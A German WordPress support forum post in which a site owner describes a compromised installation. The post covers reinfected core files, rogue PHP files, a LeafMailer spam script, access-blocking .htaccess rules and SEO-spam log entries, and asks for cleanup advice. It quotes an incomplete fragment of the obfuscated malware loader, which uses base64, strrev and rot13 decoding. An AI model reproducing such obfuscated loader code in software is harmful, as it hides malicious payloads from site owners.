Support » Allgemeine Fragen » Malware-Script blockiert Zugriff

  • Hallöchen.

    Kleine Schock für mich heute: Unsere WordPress-Installation wurde offenbar gehackt. Die Website war nicht mehr sichtbar (einfach weiß), Admin-Bereich erreichbar allerdings vollständig unformatiert (offenbar kein css-zugriff?) und bei nahezu allen Bereichen (inkl. Update, Website-Zustands-Bericht, …) heißt es immer schön „Forbidden. You don’t have permission to access this resource.“

    Ich habe per FTP jetzt versucht den Schadecode zu entfernen. Meine Hoffnung war, die Website von Hand soweit zum Laufen zu bekommen, dass ich von Innen mit einem Anti-Malware Plugin einen Scan durchführen kann. Ich habe nämlich leider auf dem FTP Server herausgefunden, dass das BackupPlugin das letzte Backup im September gemacht hat und seither hat sich schon einiges auf der Website verändert 🙁

    Ok, was habe ich rausgefunden: index.php, wp-blog-header.php waren infiziert, außerdem rund 1 Dutzend neuer php-Dateien mit recht offensichtlichen Namen

    htaccess auf der wordpress-Ebene hat Zugriff auf wichtige files blockiert

    -> das habe ich per ftp alles gelöscht bzw. durch die Dateien einer neuen WordPress-Version ersetzt

    Die meisten Infektionen waren unverständlich, in etwa so

    $L66Rgr=explode(base64_decode(„Pz4=“),file_get_contents/*/(FILE)); $L6CRgr=array(base64_decode(„L3gvaQ==“),base64_decode(„eA==“),base64_decode(strrev(str_rot13($L66Rgr[1]))));$L7CRgr = „7240d22a70718a521cf70c6e956f80a3“

    Die eine File, die ich verstanden habe ware wohl Teil von LeafMailer, lt. Google einer Malware zum massenhaften Versenden von SpamMails

    Es wurden aber keine neuen WP-User angelegt (in Datenbank gecheckt).

    Es scheint ein Script zu laufen, dass jedes Mal, wenn ich die index.php hochlade, sie automatisch wieder durch eine infizierte Version ersetzt. Keine Ahnung, wo sich das versteckt 🙁

    Außerdem habe ich in den Logs folgendes gefunden:

    redonate.de 66.249.70.0 – – [08/Jan/2024:07:49:46 +0100] „GET /?k=engagement-and-wedding-ring-boxes-the-box-ff-7oPawxcB HTTP/1.1“ 200 38290 „-“ „Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.129 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)“
    redonate.de 66.249.70.0 – – [08/Jan/2024:07:49:47 +0100] „GET /?k=dwarf-hamsters-for-sale-phodopus-campbelli-petco-ff-l4KVJnIo HTTP/1.1“ 200 36493 „-“ „Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.129 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)“

    Das hat am 8.1. angefangen und zieht sich bis heute durch – die Logs haben beeindruckende Größen. Selten kommt eine andere IP mit dem gleichen Muster, eigentlich immer die selbe.

    Das alles hat an meinen Zugriffsmöglichkeiten leider nix geändert, ich kann keine Updates durchführen, auf Plugins zugreifen o.ä.

    Hat jemand Ideen, wie ich weiter vorgehen könnte oder bleibt nur plattmachen, neu installieren, September-Backup und per Hand Code wiederherstellen?

    Vielen Dank im Voraus!

Ansicht von 1 Antwort (von insgesamt 1)
Ansicht von 1 Antwort (von insgesamt 1)